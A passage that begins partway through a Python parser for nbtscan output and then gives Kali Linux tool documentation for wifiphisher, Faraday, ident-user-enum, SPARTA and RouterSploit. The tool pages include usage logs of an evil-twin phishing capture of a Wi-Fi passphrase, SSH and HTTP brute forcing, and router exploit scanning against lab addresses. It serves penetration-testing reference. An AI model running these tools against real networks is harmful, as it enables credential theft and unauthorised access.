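
# "192.168.0.38    WORKGROUP\DOOKOSSEL             SHARING"
HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+([^\\\s]+)\\(\S+)\s*(.*)$")
# "  DOOKOSSEL      <20> UNIQUE File Server Service" (name may abut the <xx>)
RECORD_RE = re.compile(r"^\s+(.+?)\s*<([0-9a-fA-F]{2})>\s+(UNIQUE|GROUP)\s+(.*)$")
# "  00:00:00:00:00:00   ETHER"
MAC_RE = re.compile(r"^\s+([0-9a-fA-F:]{17})\s+ETHER\s*$")


@dataclass
class NameRecord:
    name: str
    suffix: int
    kind: str          # "UNIQUE" or "GROUP"
    description: str


@dataclass
class Host:
    ip: str
    workgroup: str
    netbios_name: str
    flags: str         # e.g. "SHARING"
    records: List[NameRecord] = field(default_factory=list)
    mac: Optional[str] = None


def parse_nbtscan(output: str) -> List[Host]:
    """Walk the scanner output line by line; indented lines belong to the last host."""
    hosts: List[Host] = []
    current: Optional[Host] = None
    for line in output.splitlines():
        if not line.strip() or line.startswith("*timeout"):
            continue
        m = HOST_RE.match(line)
        if m:
            current = Host(m.group(1), m.group(2), m.group(3), m.group(4).strip())
            hosts.append(current)
            continue
        if current is None:
            continue  # banner or other text before the first host
        m = MAC_RE.match(line)
        if m:
            current.mac = m.group(1)
            continue
        m = RECORD_RE.match(line)
        if m:
            current.records.append(
                NameRecord(m.group(1), int(m.group(2), 16), m.group(3), m.group(4).strip()))
    return hosts


def describe(record: NameRecord) -> str:
    return SUFFIX_LABELS.get(record.suffix, "unknown suffix 0x%02x" % record.suffix)


def hosts_offering_file_sharing(hosts: List[Host]) -> List[str]:
    """IPs whose name table carries a UNIQUE <20> (File Server Service) record."""
    return [h.ip for h in hosts
            if any(r.suffix == 0x20 and r.kind == "UNIQUE" for r in h.records)]


def master_browsers(hosts: List[Host]) -> List[str]:
    """IPs that hold the <1d> Master Browser name for their workgroup."""
    return [h.ip for h in hosts if any(r.suffix == 0x1D for r in h.records)]


# Constructed sample: the -f and -n results shown on this page, concatenated.
SAMPLE_OUTPUT = r"""
192.168.0.38    WORKGROUP\DOOKOSSEL             SHARING
  DOOKOSSEL      <00> UNIQUE Workstation Service
  DOOKOSSEL      <03> UNIQUE Messenger Service<3>
  DOOKOSSEL      <20> UNIQUE File Server Service
  ..__MSBROWSE__.<01> GROUP  Master Browser
  WORKGROUP      <00> GROUP  Domain Name
  WORKGROUP      <1d> UNIQUE Master Browser
  WORKGROUP      <1e> GROUP  Browser Service Elections
  00:00:00:00:00:00   ETHER
192.168.0.105   WORKGROUP\RETROPIE              SHARING
*timeout (normal end of scan)
"""

if __name__ == "__main__":
    for h in parse_nbtscan(SAMPLE_OUTPUT):
        print(h.ip, h.workgroup, h.netbios_name, h.flags, h.mac)
        for r in h.records:
            print("   <%02x> %-6s %-16s %s" % (r.suffix, r.kind, r.name, describe(r)))
```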


wifiphisher

wifiphisher Package Description

Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with ‘malware’. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing.
After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim’s perspective, the attack takes place in three phases:

  1. Victim is deauthenticated from their access point.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point settings.
  3. Victim is served a realistic specially-customized phishing page.

Source: https://wifiphisher.org/docs.html
wifiphisher Homepage | Kali wifiphisher Repo

  • Author: sophron
  • License: GPLv3

Tools included in the wifiphisher package

wifiphisher – Automated phishing attacks against Wi-Fi networks
root@kali:~# wifiphisher -h
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
                   [-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
                   [-T TEMPLATE] [-pK PRESHAREDKEY]

optional arguments:
  -h, --help            show this help message and exit
  -s SKIP, --skip SKIP  Skip deauthing this MAC address. Example: -s
                        00:11:BB:33:44:AA
  -jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
                        Choose monitor mode interface. By default script will
                        find the most powerful interface and starts monitor
                        mode on it. Example: -jI mon5
  -aI APINTERFACE, --apinterface APINTERFACE
                        Choose access point interface. By default script will
                        find the most powerful interface and starts an access
                        point on it. Example: -aI wlan0
  -t TIMEINTERVAL, --timeinterval TIMEINTERVAL
                        Choose the time interval between packets being sent.
                        Default is as fast as possible. If you see scapy
                        errors like 'no buffer space' try: -t .00001
  -p PACKETS, --packets PACKETS
                        Choose the number of packets to send in each deauth
                        burst. Default value is 1; 1 packet to the client and
                        1 packet to the AP. Send 2 deauth packets to the
                        client and 2 deauth packets to the AP: -p 2
  -d, --directedonly    Skip the deauthentication packets to the broadcast
                        address ofthe access points and only send them to
                        client/AP pairs
  -nJ, --nojamming      Skip the deauthentication phase.
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue access point (Evil Twin)
                        This will skip Access Point selection phase.
  -T TEMPLATE, --template TEMPLATE
                        Choose the template to run.Using this option will skip
                        the interactive selection
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point

wifiphisher Usage Examples

Do not perform jamming (-nJ), create a wireless access point (-e "Free Wi-Fi") and present a fake firmware upgrade to clients (-T firmware-upgrade). When a client connects, they are presented with a web page asking for the PSK of their network:

root@kali:~# wifiphisher -nJ -e "Free Wi-Fi" -T firmware-upgrade
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...

Jamming devices:



DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3


HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93

Faraday

python-faraday Package Description

Faraday introduces a new concept, the IPE (Integrated Penetration-Test Environment): a multiuser penetration test IDE designed for the distribution, indexing and analysis of the data generated during a security audit.

The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. It was developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test.

Source: https://github.com/infobyte/faraday
Faraday Homepage | Kali python-faraday Repo | Kali python-faraday Package

  • Author: Infobyte LLC
  • License: GPLv3

Tools included in the python-faraday package

python-faraday – Collaborative Penetration Test IDE
root@kali:~# python-faraday -h
usage: faraday.py [-h] [-n HOST] [-px PORT_XMLRPC] [-pr PORT_REST] [-d]
                  [--profile] [--profile-output PROFILE_OUTPUT]
                  [--profile-depth PROFILE_DEPTH] [--disable-excepthook]
                  [--dev-mode] [--ignore-deps] [--update] [--cert CERT_PATH]
                  [--gui GUI] [--cli] [-w WORKSPACE] [-r FILENAME]

Faraday's launcher parser.

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           Enables debug mode. Default = disabled
  --disable-excepthook  Disable the application exception hook that allows to
                        send error reports to developers.
  --dev-mode            Enable dev mode. This will use the user config and
                        plugin folder.
  --ignore-deps         Ignore python dependencies resolution.
  --update              Update Faraday IDE.
  --cert CERT_PATH      Path to the valid CouchDB certificate
  --gui GUI             Select interface to start faraday. Supported values
                        are gtk and 'no' (no GUI at all). Defaults to GTK
  --cli                 Set this flag to avoid gui and use faraday as a cli.
  -w WORKSPACE, --workspace WORKSPACE
                        Workspace to be opened
  -r FILENAME, --report FILENAME
                        Report to be parsed by the cli

connection:
  -n HOST, --hostname HOST
                        The hostname where both server APIs will listen
                        (XMLRPC and RESTful). Default = localhost
  -px PORT_XMLRPC, --port-xmlrpc PORT_XMLRPC
                        Sets the port where the api XMLRPCServer will listen.
                        Default = 9876
  -pr PORT_REST, --port-rest PORT_REST
                        Sets the port where the api RESTful server will
                        listen. Default = 9977

profiling:
  --profile             Enables application profiling. When this option is
                        used --profile-output and --profile-depth can also be
                        used. Default = disabled
  --profile-output PROFILE_OUTPUT
                        Sets the profile output filename. If no value is
                        provided, standard output will be used
  --profile-depth PROFILE_DEPTH
                        Sets the profile number of entries (depth). Default =
                        500

Faraday Usage Examples

Faraday is a GUI application that consists of a ZSH terminal and a sidebar with details about your workspaces and hosts.

When Faraday supports the command you are running, it will automatically detect it and import the results. In the example below, the original nmap command that was entered was nmap -A 192.168.0.7, which Faraday converted on the fly.

>>> WELCOME TO FARADAY
[+] Current Workspace: dev1
[+] API: OK
[faraday](dev1) kali#  nmap -oX /root/.faraday/data/devel1_Nmap_output-3.46164772371.xml -A 192.168.0.7 2>&1 | tee -a tmp.tu0ldZUG2JgzuHvLOjBYEzBx3Bu7O

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-07 13:46 MST
Nmap scan report for pi-hole (192.168.0.7)
Host is up (0.0011s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 6.7p1 Raspbian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 f7:5d:7c:e2:c5:46:32:19:08:e9:4b:79:5e:80:1c:83 (DSA)
|   2048 3c:f9:1d:ce:03:0f:2e:d2:17:05:77:af:81:54:32:fc (RSA)
|_  256 ea:20:d1:e0:e1:89:2c:65:9e:0d:d0:d0:e9:8b:9b:28 (ECDSA)
53/tcp  open  domain     dnsmasq 2.72
| dns-nsid:
|_  bind.version: dnsmasq-2.72
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Welcome page
110/tcp open  tcpwrapped
143/tcp open  tcpwrapped
Device type: general purpose
Running: Linux 2.4.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2
OS details: DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.27 ms 172.16.206.2
2   0.21 ms pi-hole (192.168.0.7)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.41 seconds
[faraday](devel1) kali#

Once the nmap scan is finished, double-clicking on the host under the Hosts tab will bring up details about the host, its services, and any vulnerabilities that were detected.

The excellent dirb utility is also supported by Faraday by default:

[faraday](devel1) kali#  dirb http://192.168.0.23/commix-testbed -w 2>&1 | tee -a tmp.qNejUxvvrPpbGPVEfwf8OZOuM1F1E

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Mar  7 13:58:52 2017
URL_BASE: http://192.168.0.23/commix-testbed/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.0.23/commix-testbed/ ----
==> DIRECTORY: http://192.168.0.23/commix-testbed/css/
==> DIRECTORY: http://192.168.0.23/commix-testbed/fonts/
==> DIRECTORY: http://192.168.0.23/commix-testbed/img/
+ http://192.168.0.23/commix-testbed/index.php (CODE:200|SIZE:14346)
==> DIRECTORY: http://192.168.0.23/commix-testbed/js/
==> DIRECTORY: http://192.168.0.23/commix-testbed/readme/

---- Entering directory: http://192.168.0.23/commix-testbed/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.23/commix-testbed/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.23/commix-testbed/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.23/commix-testbed/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.23/commix-testbed/readme/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Mar  7 14:04:24 2017
DOWNLOADED: 27672 - FOUND: 1

When the scan is finished, double-clicking on the host will bring up its details, including the directories that dirb detected.

Take a look in the /usr/share/python-faraday/plugins/repo directory to see what other applications Faraday supports.

root@kali:/usr/share/python-faraday/plugins/repo# ls
acunetix  dnsrecon      listurl       netsparker     retina          wapiti
amap      dnswalk       maltego       nexpose        reverseraider   wcscan
appscan   fierce        masscan       nexpose-full   sentinel        webfuzzer
arachni   fruitywifi    medusa        nikto          skipfish        whois
arp-scan  ftp           metagoofil    nmap           sqlmap          wpscan
beef      goohost       metasploit    openvas        sshdefaultscan  x1
burp      hping3        metasploiton  pasteanalyzer  sslcheck        zap
dig       hydra         ndiff         peepingtom     telnet
dirb      impact        nessus        ping           theharvester
dnsenum   __init__.py   netcat        propecia       traceroute
dnsmap    __init__.pyc  netdiscover   qualysguard    w3af

Faraday also includes a full-featured web interface that provides you, your team, and any other interested parties with an immense amount of information.

ident-user-enum

ident-user-enum Package Description

ident-user-enum is a simple Perl script that queries the ident service (113/TCP) to determine the owner of the process listening on each TCP port of a target system.
This can help to prioritise target services during a pentest (you might want to attack services running as root first). Alternatively, the list of usernames gathered can be used for password guessing attacks on other network services.

Source: http://pentestmonkey.net/tools/user-enumeration/ident-user-enum
ident-user-enum Homepage | Kali ident-user-enum Repo

  • Author: pentestmonkey
  • License: GPLv2

Tools included in the ident-user-enum package

ident-user-enum – Query ident to determine the owner of a TCP network process
root@kali:~# ident-user-enum
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

Usage: ident-user-enum.pl ip port [ port [ port ... ] ]

Queries the ident service (113/TCP) to determine the OS-level user running
the process listening on a given TCP port.  More than one port can be supplied.

ident-user-enum Usage Examples

Scan the remote host (192.168.1.13) and determine which user is running the service on each of the specified ports (22, 139 and 445):

root@kali:~# ident-user-enum 192.168.1.13 22 139 445
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

192.168.1.13:22 root
192.168.1.13:139    root
192.168.1.13:445    root

SPARTA

sparta Package Description

SPARTA is a python GUI application that simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to their toolkit and by displaying all tool output in a convenient way. If less time is spent setting up commands and tools, more time can be spent focusing on analysing results.

Source: http://sparta.secforce.com/
SPARTA Homepage | Kali sparta Repo

  • Author: SECFORCE (Antonio Quina and Leonidas Stavliotis)
  • License: GPLv3

Tools included in the sparta package

sparta – Network Infrastructure Penetration Testing Tool

SPARTA main window

SPARTA Usage Examples

When SPARTA is first launched, either via the Kali Applications menu or by running sparta at the command line, the main interface opens and presents you with your workspace. Initially, the hosts pane is empty, so you can either import an Nmap scan results file or, as this example shows, click in the pane on the text "Click here to add host(s) to scope".

After clicking "Add to scope", the Nmap scan begins and a progress indicator appears in the Log pane.

The default Nmap scan is quite thorough and will take some time to complete. Once SPARTA has some hosts and ports to work with, it proceeds to run additional tools against the discovered services such as nikto, smbenum, snmpcheck, and more.

Selecting a host in the Hosts pane displays a tab for each of the scans that were run against the host, including screenshots of any web servers that it encountered.

Services that require a login, such as telnet, SSH, HTTP, etc., can be sent to the brute force tool to try to crack the password. We can do this by right-clicking a service and selecting "Send to Brute".

After we configure our settings, we let SPARTA begin attacking the root password over SSH with a pre-defined wordlist.

SPARTA has many more features available than we covered here and it is worth the time to get to know it better. It can save you a great deal of time in a penetration test by automating many tedious tasks.

RouterSploit

routersploit Package Description

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of various modules that aid penetration testing operations:

  • exploits – modules that take advantage of identified vulnerabilities
  • creds – modules designed to test credentials against network services
  • scanners – modules that check if a target is vulnerable to any exploit

Source: https://github.com/reverse-shell/routersploit
RouterSploit Homepage | Kali routersploit Repo

  • Author: Reverse Shell Security
  • License: BSD-3-clause

Tools included in the routersploit package

routersploit – The RouterSploit Framework
root@kali:~# routersploit
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Bad Blood
 Version  : 2.0.0

 Total module count: 40

rsf >

RouterSploit Usage Examples

RouterSploit has a number of exploits for different router models, and each one can check whether the remote target is vulnerable before the exploit is actually sent.

rsf > use exploits/multi/misfortune_cookie
rsf (Misfortune Cookie) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   port       80                   Target port
   target                          Target address e.g. http://192.168.1.1


rsf (Misfortune Cookie) > set target 192.168.0.2
[+] {'target': '192.168.0.2'}
rsf (Misfortune Cookie) > check
[-] Target is not vulnerable
rsf (Misfortune Cookie) >

If stealth is not a requirement, you can attempt to use the autopwn scanner module to see if any vulnerabilities can be found.

rsf > use scanners/autopwn
rsf (AutoPwn) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   port       80                   Target port
   target                          Target IP address e.g. 192.168.1.1


rsf (AutoPwn) > set target 192.168.0.2
[+] {'target': '192.168.0.2'}
rsf (AutoPwn) > run
[*] Running module...
[-] exploits/fortinet/fortigate_os_backdoor is not vulnerable
[-] exploits/belkin/n150_path_traversal is not vulnerable
[-] exploits/belkin/g_n150_password_disclosure is not vulnerable
[-] exploits/belkin/n750_rce is not vulnerable
[-] exploits/belkin/g_plus_info_disclosure is not vulnerable
[-] exploits/asus/infosvr_backdoor_rce is not vulnerable
[-] exploits/asus/rt_n16_password_disclosure is not vulnerable
[-] exploits/2wire/gateway_auth_bypass is not vulnerable
[-] exploits/technicolor/tc7200_password_disclosure is not vulnerable
[-] exploits/netgear/multi_rce is not vulnerable
[-] exploits/netgear/n300_auth_bypass is not vulnerable
[-] exploits/netgear/prosafe_rce is not vulnerable
[-] exploits/asmax/ar_1004g_password_disclosure is not vulnerable
[-] exploits/asmax/ar_804_gu_rce is not vulnerable
[-] exploits/linksys/wap54gv3_rce is not vulnerable
[-] exploits/linksys/1500_2500_rce is not vulnerable
[-] exploits/multi/misfortune_cookie is not vulnerable
[-] exploits/cisco/ucs_manager_rce is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dwr_932_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dvg_n5402sp_path_traversal is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[-] exploits/juniper/screenos_backdoor is not vulnerable
[-] exploits/comtrend/ct_5361t_password_disclosure is not vulnerable
[-] Device is not vulnerable to any exploits!

rsf (AutoPwn) >

If all else fails, RouterSploit has a number of creds modules that can brute force various services, including HTTP, SSH, and Telnet.

rsf > use creds/http_basic_bruteforce
rsf (HTTP Basic Bruteforce) > show options

Target options:

   Name       Current settings     Description                                              
   ----       ----------------     -----------                                              
   port       80                   Target port                                              
   target                          Target IP address or file with target:port (file://)    


Module options:

   Name          Current settings                                                        Description                                  
   ----          ----------------                                                        -----------                                  
   path          /                                                                       URL Path                                      
   usernames     admin                                                                   Username or file with usernames (file://)    
   passwords     file:///usr/share/routersploit/routersploit/wordlists/passwords.txt     Password or file with passwords (file://)    
   threads       8                                                                       Numbers of threads                            
   verbosity     yes                                                                     Display authentication attempts              


rsf (HTTP Basic Bruteforce) > set target 192.168.0.2
[+] {'target': '192.168.0.2'}
rsf (HTTP Basic Bruteforce) > set passwords file:///usr/share/wordlists/nmap.lst
[+] {'passwords': 'file:///usr/share/wordlists/nmap.lst'}
rsf (HTTP Basic Bruteforce) > set verbosity no
[+] {'verbosity': 'no'}
rsf (HTTP Basic Bruteforce) > run
[*] Running module...
[*] Elapsed time:  1.97385120392 seconds
[+] Credentials found!

   Target          Port     Login     Password    
   ------          ----     -----     --------    
   192.168.0.2     80       admin     password    

rsf (HTTP Basic Bruteforce) >
